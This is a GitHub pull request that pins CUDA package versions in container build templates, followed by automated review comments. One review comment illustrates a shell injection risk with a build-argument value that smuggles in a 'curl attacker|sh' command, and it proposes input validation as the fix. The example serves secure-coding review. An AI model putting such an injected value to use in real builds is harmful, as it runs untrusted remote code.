Skip to content

Pin unpinned CUDA packages for reproducible builds (#162)#203

Draft
smoparth wants to merge 1 commit intoopendatahub-io:mainfrom
smoparth:issue/162-pin-cuda-packages
Draft

Pin unpinned CUDA packages for reproducible builds (#162)#203
smoparth wants to merge 1 commit intoopendatahub-io:mainfrom
smoparth:issue/162-pin-cuda-packages

Conversation

@smoparth
Copy link
Copy Markdown
Member

@smoparth smoparth commented Apr 20, 2026

Pin cuda-cupti, libcusparselt0, and libcudss0 with explicit versions sourced from NVIDIA's RPM repository. These ODH-specific packages were previously installed without version pins, making builds non-reproducible.

  • Add NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION build args to template and all 5 app.conf files (12.8–13.2)
  • Document why cuda-compat is intentionally left unpinned (NVIDIA's forward-compatibility design for GPU driver compatibility)
  • Add new keys to generate-containerfile.sh so future versions get TODO markers

cuda-toolkit meta-package is left as-is; replacing it with granular packages requires a dependency audit and should be a separate issue.

Description

How Has This Been Tested?

Merge criteria:

  • The commits are squashed in a cohesive manner and have meaningful messages.
  • Testing instructions have been added in the PR body (for PRs involving changes that are not immediately obvious).
  • The developer has manually tested the changes and verified that the changes work

Summary by CodeRabbit

  • Chores
    • Enhanced CUDA container build configuration across versions 12.8–13.2 to enable precise versioning of CUPTI, cuSPARSELt, and cuDSS libraries, resulting in more reproducible and consistent container image builds.

Pin cuda-cupti, libcusparselt0, and libcudss0 with explicit versions
sourced from NVIDIA's RPM repository. These ODH-specific packages were
previously installed without version pins, making builds non-reproducible.

- Add NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION
  build args to template and all 5 app.conf files (12.8–13.2)
- Document why cuda-compat is intentionally left unpinned (NVIDIA's
  forward-compatibility design for GPU driver compatibility)
- Add new keys to generate-containerfile.sh so future versions get
  TODO markers

cuda-toolkit meta-package is left as-is; replacing it with granular
packages requires a dependency audit and should be a separate issue.
@smoparth smoparth marked this pull request as draft April 20, 2026 12:21
@coderabbitai
Copy link
Copy Markdown

coderabbitai Bot commented Apr 20, 2026

📝 Walkthrough

Walkthrough

This pull request introduces three new build argument parameters (NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION) across CUDA container definitions for versions 12.8, 12.9, 13.0, 13.1, and 13.2. The Containerfile.cuda.template and corresponding individual Containerfiles are updated to declare these arguments and replace unversioned or partially-versioned package references with explicit version-suffixed package installation strings. Configuration files (app.conf) for each CUDA version supply the specific version values for these arguments. The build script that generates Containerfiles was updated to include these keys in its TODO-comment logic.

Estimated Code Review Effort

🎯 2 (Simple) | ⏱️ ~12 minutes

Issues

No actionable issues identified. The changes follow consistent, repetitive patterns across multiple files with identical structural transformations. Version pinning improves reproducibility and supply chain control. All build argument declarations are properly propagated through template and individual Containerfiles.

🚥 Pre-merge checks | ✅ 2
✅ Passed checks (2 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title check ✅ Passed The title accurately summarizes the main objective: pinning previously unpinned CUDA packages (cuda-cupti, libcusparselt0, libcudss0) across multiple CUDA versions to enable reproducible builds.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.


Comment @coderabbitai help to get the list of available commands and usage tips.

Copy link
Copy Markdown

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
cuda/12.8/Containerfile (1)

112-120: ⚠️ Potential issue | 🟠 Major

Unbounded dnf upgrade keeps this image non-reproducible.

Line 117 upgrades the whole base at build time, so resulting package versions drift across builds even when newly pinned CUDA subpackages stay fixed.

Suggested fix (deterministic by default)
+ARG DNF_UPGRADE=0
 RUN --mount=type=cache,target=/var/cache/dnf,sharing=locked,id=odh-base-containers-cuda-dnf \
-    dnf upgrade -y --setopt=keepcache=1 && \
+    if [ "${DNF_UPGRADE}" = "1" ]; then dnf upgrade -y --setopt=keepcache=1; fi && \
     dnf install -y --setopt=keepcache=1 \
         cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} \
         cuda-compat-${CUDA_MAJOR_MINOR}

As per coding guidelines, **: REVIEW PRIORITIES: 3. Bug-prone patterns and error handling gaps.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@cuda/12.8/Containerfile` around lines 112 - 120, The RUN currently performs
an unpinned "dnf upgrade -y" which makes the image non-reproducible; remove the
unbounded upgrade and only install the explicit CUDA packages with pinned
versions instead. Concretely, delete "dnf upgrade -y --setopt=keepcache=1 && \"
from the RUN line and keep a single "dnf install -y --setopt=keepcache=1
cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION}
cuda-compat-${CUDA_MAJOR_MINOR}" (or expand to list and pin any additional OS
packages you need) so only known, deterministic package versions are installed
rather than upgrading the entire base. Ensure the change targets the RUN that
references cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} and
cuda-compat-${CUDA_MAJOR_MINOR}.
🧹 Nitpick comments (1)
scripts/generate-containerfile.sh (1)

255-260: Ensure missing NVIDIA keys are inserted, not only annotated.

The loop only adds TODO comments for existing keys. If a source app.conf is missing one of these new keys, generation silently skips it and leaves the new version under-specified.

Suggested hardening
 for key in "${nvidia_keys[@]}"; do
-    # Add TODO comment before each NVIDIA-specific key (if not already present)
-    if grep -q "^${key}=" "${new_conf}" && ! grep -B1 "^${key}=" "${new_conf}" | grep -q "# TODO: update from NVIDIA"; then
-        sed -i "/^${key}=/s/^/# TODO: update from NVIDIA\n/" "${new_conf}"
-    fi
+    if grep -q "^${key}=" "${new_conf}"; then
+        # Add TODO comment before each NVIDIA-specific key (if not already present)
+        if ! grep -B1 "^${key}=" "${new_conf}" | grep -q "# TODO: update from NVIDIA"; then
+            sed -i "/^${key}=/s/^/# TODO: update from NVIDIA\n/" "${new_conf}"
+        fi
+    else
+        {
+            echo "# TODO: update from NVIDIA"
+            echo "${key}="
+        } >> "${new_conf}"
+    fi
 done

As per coding guidelines, **: REVIEW PRIORITIES: 3. Bug-prone patterns and error handling gaps.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@scripts/generate-containerfile.sh` around lines 255 - 260, The current loop
only annotates existing NVIDIA keys in new_conf and ignores keys missing from
the source; update the loop that iterates over nvidia_keys to also insert
missing keys into new_conf (not just add a comment) by checking presence with
grep for "^${key}=" and if absent appending a TODO comment plus a placeholder
entry (e.g., "# TODO: update from NVIDIA" followed by "${key}=" or a default
value) into new_conf so the generated config is explicit; keep the existing
branch that prepends the TODO comment when the key exists (the code around the
for loop, nvidia_keys, new_conf, and the sed/grep checks).
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@Containerfile.cuda.template`:
- Around line 22-25: The Dockerfile/template declares build args
NV_CUDA_CUPTI_VERSION, NV_CUDNN_VERSION, NV_LIBCUSPARSELT_VERSION, and
NV_LIBCUDSS_VERSION and then directly interpolates them into a shell command
(the dnf install invocation), which allows shell metacharacter injection; fix by
validating/sanitizing those ARG values before any shell expansion: add a short
validation step (e.g., a shell snippet using a strict regex like
/^[A-Za-z0-9._+-]+$/) that checks each of NV_CUDA_CUPTI_VERSION,
NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION (and NV_CUDNN_VERSION if used
similarly) and exits the build with an error if validation fails, or
alternatively switch to using these as literal package names passed without
shell expansion (e.g., pass them into a non-interpolated form or use
--define/--arg-safe mechanism) so no untrusted characters can be executed;
ensure the check/validation appears before the dnf install/command that
interpolates ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and
${NV_LIBCUDSS_VERSION}.

---

Outside diff comments:
In `@cuda/12.8/Containerfile`:
- Around line 112-120: The RUN currently performs an unpinned "dnf upgrade -y"
which makes the image non-reproducible; remove the unbounded upgrade and only
install the explicit CUDA packages with pinned versions instead. Concretely,
delete "dnf upgrade -y --setopt=keepcache=1 && \" from the RUN line and keep a
single "dnf install -y --setopt=keepcache=1
cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION}
cuda-compat-${CUDA_MAJOR_MINOR}" (or expand to list and pin any additional OS
packages you need) so only known, deterministic package versions are installed
rather than upgrading the entire base. Ensure the change targets the RUN that
references cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} and
cuda-compat-${CUDA_MAJOR_MINOR}.

---

Nitpick comments:
In `@scripts/generate-containerfile.sh`:
- Around line 255-260: The current loop only annotates existing NVIDIA keys in
new_conf and ignores keys missing from the source; update the loop that iterates
over nvidia_keys to also insert missing keys into new_conf (not just add a
comment) by checking presence with grep for "^${key}=" and if absent appending a
TODO comment plus a placeholder entry (e.g., "# TODO: update from NVIDIA"
followed by "${key}=" or a default value) into new_conf so the generated config
is explicit; keep the existing branch that prepends the TODO comment when the
key exists (the code around the for loop, nvidia_keys, new_conf, and the
sed/grep checks).
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Central YAML (base), Organization UI (inherited)

Review profile: CHILL

Plan: Pro Plus

Run ID: ea7da75c-da5a-4271-9230-d1bca0ce8b57

📥 Commits

Reviewing files that changed from the base of the PR and between 1d44494 and f3ef386.

📒 Files selected for processing (12)
  • Containerfile.cuda.template
  • cuda/12.8/Containerfile
  • cuda/12.8/app.conf
  • cuda/12.9/Containerfile
  • cuda/12.9/app.conf
  • cuda/13.0/Containerfile
  • cuda/13.0/app.conf
  • cuda/13.1/Containerfile
  • cuda/13.1/app.conf
  • cuda/13.2/Containerfile
  • cuda/13.2/app.conf
  • scripts/generate-containerfile.sh

Comment on lines +22 to +25
ARG NV_CUDA_CUPTI_VERSION
ARG NV_CUDNN_VERSION
ARG NV_LIBCUSPARSELT_VERSION
ARG NV_LIBCUDSS_VERSION
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Locate all NV_* interpolations introduced in dnf install lines:"
rg -n 'cuda-cupti-\$\{CUDA_MAJOR_MINOR\}-\$\{NV_CUDA_CUPTI_VERSION\}|libcusparselt0-\$\{NV_LIBCUSPARSELT_VERSION\}|libcudss0-cuda-\$\{CUDA_MAJOR\}-\$\{NV_LIBCUDSS_VERSION\}' Containerfile.cuda.template cuda/*/Containerfile

echo
echo "Check whether allowlist validation exists for these args (expected: no matches before fix):"
rg -n 'Invalid NV_\* version|grep -E.*NV_(CUDA_CUPTI|LIBCUSPARSELT|LIBCUDSS)_VERSION|case .*NV_(CUDA_CUPTI|LIBCUSPARSELT|LIBCUDSS)_VERSION' Containerfile.cuda.template cuda/*/Containerfile

Repository: opendatahub-io/base-containers

Length of output: 1820


Validate NV_* build args before shell expansion (CWE-77/CWE-88, Major).

Lines 171–173 interpolate ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and ${NV_LIBCUDSS_VERSION} directly into the dnf install command without validation. Since build args are externally overridable, hostile or malformed values can inject shell metacharacters during image build.

Exploit: NV_LIBCUDSS_VERSION='0.7.1.4-1;curl attacker|sh' executes arbitrary code in the build environment.

Remediation (apply to template, regenerate Containerfiles)
 RUN --mount=type=cache,target=/var/cache/dnf,sharing=locked,id=odh-base-containers-cuda-dnf \
+    set -euo pipefail; \
+    for v in "${NV_CUDA_CUPTI_VERSION}" "${NV_LIBCUSPARSELT_VERSION}" "${NV_LIBCUDSS_VERSION}"; do \
+      printf '%s\n' "${v}" | grep -Eq '^[0-9][0-9A-Za-z._:+~-]*$' || { \
+        echo "Invalid NV_* version value: ${v}" >&2; exit 1; \
+      }; \
+    done; \
     dnf install -y --setopt=keepcache=1 \
         cuda-cupti-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUPTI_VERSION} \
         libcusparselt0-${NV_LIBCUSPARSELT_VERSION} \
         libcudss0-cuda-${CUDA_MAJOR}-${NV_LIBCUDSS_VERSION}

Also affects: lines 22–25, 60–63 (ARG declarations); generated Containerfiles cuda/13.2, 13.1, 13.0, 12.9, 12.8.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@Containerfile.cuda.template` around lines 22 - 25, The Dockerfile/template
declares build args NV_CUDA_CUPTI_VERSION, NV_CUDNN_VERSION,
NV_LIBCUSPARSELT_VERSION, and NV_LIBCUDSS_VERSION and then directly interpolates
them into a shell command (the dnf install invocation), which allows shell
metacharacter injection; fix by validating/sanitizing those ARG values before
any shell expansion: add a short validation step (e.g., a shell snippet using a
strict regex like /^[A-Za-z0-9._+-]+$/) that checks each of
NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION (and
NV_CUDNN_VERSION if used similarly) and exits the build with an error if
validation fails, or alternatively switch to using these as literal package
names passed without shell expansion (e.g., pass them into a non-interpolated
form or use --define/--arg-safe mechanism) so no untrusted characters can be
executed; ensure the check/validation appears before the dnf install/command
that interpolates ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and
${NV_LIBCUDSS_VERSION}.

@smoparth
Copy link
Copy Markdown
Member Author

/retest

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant